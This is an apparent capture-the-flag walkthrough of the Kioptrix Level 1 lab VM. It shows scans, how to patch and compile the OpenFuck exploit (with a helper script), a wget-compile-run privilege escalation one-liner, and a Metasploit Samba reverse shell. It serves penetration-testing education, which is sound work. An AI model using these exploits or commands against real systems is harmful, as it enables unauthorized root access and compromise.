Core dump overflow

Core dump in progress...

Pentest lab - Kioptrix Level 1


For today’s pentest lab, I will use the Kioptrix Level 1 virtual machine as the target. Kioptrix Level 1 is the first in a series of vulnerable machines for beginner penetration testing practice.

First, to get its IP address, I had to ping sweep the subnet with the following command:

nmap -sP 192.168.127.0/24

By correlating the MAC address information from the scan with that from VMware, I now know the IP for the machine is 192.168.127.153.

Now, port scan the target:

root@kali:~# nmap -A -p1-65535 192.168.127.153

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-12 22:56 EEST
Nmap scan report for 192.168.127.153
Host is up (0.00035s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after:  2010-09-26T08:32:06+00:00
|_ssl-date: 2014-06-12T19:58:14+00:00; +1m51s from local time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
MAC Address: 00:0C:29:1A:EE:9E (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.127.153

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.11 seconds

Port 22 ssh

According to Nessus, the SSH version is vulnerable to CVE-2002-0083:

Versions prior to 3.1 are vulnerable to an off-by-one error that allows local users to gain root access, and it may be possible for remote users to similarly compromise the daemon for remote access. In addition, a vulnerable SSH client may be compromised by connecting to a malicious SSH daemon that exploits this vulnerability in the client code, thus compromising the client system.

I searched, but I couldn’t find a suitable exploit for this, so I will leave it at that.

Port 80 / 443 apache ssl

Now let’s try that outdated Apache server. Here are the results from a Nikto scan against it:

root@kali:~# nikto -host 192.168.127.153
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.127.153
+ Target Hostname:    192.168.127.153
+ Target Port:        80
+ Start Time:         2014-06-13 00:13:08 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 06:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 7355 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time:           2014-06-13 00:13:52 (GMT3) (44 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The interesting line that will lead to the exploit is this one:

+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.

mod_ssl before 2.8.7 has a remotely exploitable buffer overflow in its SSL session cache (CVE-2002-0082), which is what Nikto is flagging. The exploit used below, OpenFuck, actually goes after the neighbouring OpenSSL 0.9.6 code instead: the KEY_ARG buffer overflow in the SSLv2 handshake (CVE-2002-0656), which the nmap output above shows is still enabled on port 443. Either way the result is code execution inside the Apache process, i.e. a shell as the unprivileged Apache user; getting to root needs a second, local step.

An exploit is available at http://www.exploit-db.com/exploits/764/

Before jumping in, the exploit needs a few source changes because it is old: built against a current OpenSSL it fails with a pile of compiler errors. So let’s make the changes.

If you don’t already have it, install the libssl-dev library:

 apt-get install libssl-dev

Now add the following two includes to the C source, alongside the existing ones:

#include <openssl/rc4.h>
#include <openssl/md5.h>

Next, search for wget in the source. After spawning a shell, the exploit automatically runs a command that downloads and compiles ptrace-kmod.c; the host it downloads from is long gone, so replace the URL with the newer one:

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

In the get_server_hello function, change the declaration

unsigned char *p, *end; 

to

const unsigned char *p, *end;

Now we can compile the exploit:

gcc -o openfuck openfuck.c -lcrypto
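The three source edits above can be applied in one step instead of by hand. The shell function below is an added example, not part of the original post or of the exploit’s source; it assumes the exploit was saved as openfuck.c and that the source contains the single `unsigned char *p, *end;` declaration the post refers to. The second function builds a constructed stand-in for the real file so the patcher can be exercised offline (the old URL in it is made up); the ptrace-kmod URL is the one from the post and may itself have moved since 2014.

```shell
#!/bin/sh
# patch_openfuck FILE: apply the three walkthrough edits to a copy of OpenFuck
# (exploit-db 764) so it builds against a current libssl-dev:
#   1. add the OpenSSL rc4/md5 headers the exploit uses but never includes
#   2. point the built-in post-exploitation wget at the packetstorm mirror
#      (URL taken from the post; assumed still valid)
#   3. make the get_server_hello pointers const to match modern OpenSSL prototypes
patch_openfuck() {
    f="$1"
    tmp="$f.tmp"
    {
        printf '#include <openssl/rc4.h>\n#include <openssl/md5.h>\n'
        sed -e 's#wget http://[^ ;]*ptrace-kmod\.c#wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c#' \
            -e 's/^\([[:space:]]*\)unsigned char \*p, \*end;/\1const unsigned char *p, *end;/' "$f"
    } > "$tmp" && mv "$tmp" "$f"
}

# make_sample FILE: constructed stand-in for openfuck.c containing only the
# lines the edits touch (the real file is far longer). The old host is hypothetical.
make_sample() {
    cat > "$1" <<'EOF'
#include <openssl/ssl.h>
#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://old.example.invalid/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
int get_server_hello(ssl_conn *ssl)
{
    unsigned char *p, *end;
    return 0;
}
EOF
}

# check_patched FILE: returns 0 if every expected edit is present, 1 otherwise.
check_patched() {
    grep -q '^#include <openssl/rc4.h>$' "$1" &&
    grep -q '^#include <openssl/md5.h>$' "$1" &&
    grep -q 'wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c;' "$1" &&
    grep -q 'const unsigned char \*p, \*end;' "$1" &&
    ! grep -q 'old.example.invalid' "$1"
}

# Usage on the real exploit source:
#   patch_openfuck openfuck.c && gcc -o openfuck openfuck.c -lcrypto
```

Run `check_patched openfuck.c` before compiling: if it fails, the exploit copy you downloaded differs from the one the post used and the sed patterns need adjusting by hand.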

Run the compiled binary with no arguments and it prints the list of supported targets and their offsets. From the scan we know the target runs Red Hat’s Apache 1.3.20 build, so we can scroll through the list for it or just filter:

./openfuck | grep -i redhat | grep "1.3.20"

This will give us two offsets:

0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

So, let’s try it out:

./openfuck 0x6a 192.168.127.153 443

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80fe500
Ready to send shellcode
Spawning shell...
Good Bye!

Ok, that one didn’t work. Let’s try the other one:

./openfuck 0x6b 192.168.127.153 443

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80fc4e8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;
--14:29:59--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

14:30:00 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 1444
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root

And we got root. Note that this took two stages: OpenFuck itself only landed an unprivileged shell (the bash-2.05$ prompt), and it was the exploit’s built-in follow-up command, fetching, compiling and running ptrace-kmod.c, that escalated. ptrace-kmod.c is a local privilege escalation for the ptrace/kmod race condition in Linux 2.2 and 2.4 kernels (CVE-2003-0127), which fits the Linux 2.4.x the nmap OS detection reported.

Port 139 samba

The exploit for this is available in Metasploit:

Samba trans2open Overflow (Linux x86)

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.

msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce


msf exploit(trans2open) > set RHOST 192.168.127.153
RHOST => 192.168.127.153
msf exploit(trans2open) > set payload linux/x86/shell_reverse_tcp 
payload => linux/x86/shell_reverse_tcp
msf exploit(trans2open) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(trans2open) > exploit

[*] Started reverse handler on 192.168.127.159:4444 
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Trying return address 0xbffff9fc...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.153:1047) at 2014-06-13 00:31:15 +0300
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.153:1048) at 2014-06-13 00:31:15 +0300

whoami
root

There is a flag present on this machine, which is located here:

/var/spool/mail/root

If you are reading this, you got root. Congratulations. Level 2 won’t be as easy…

And this was the first level in the Kioptrix series. Here’s a cookie till next time:

You’re a card which will have to be dealt with.
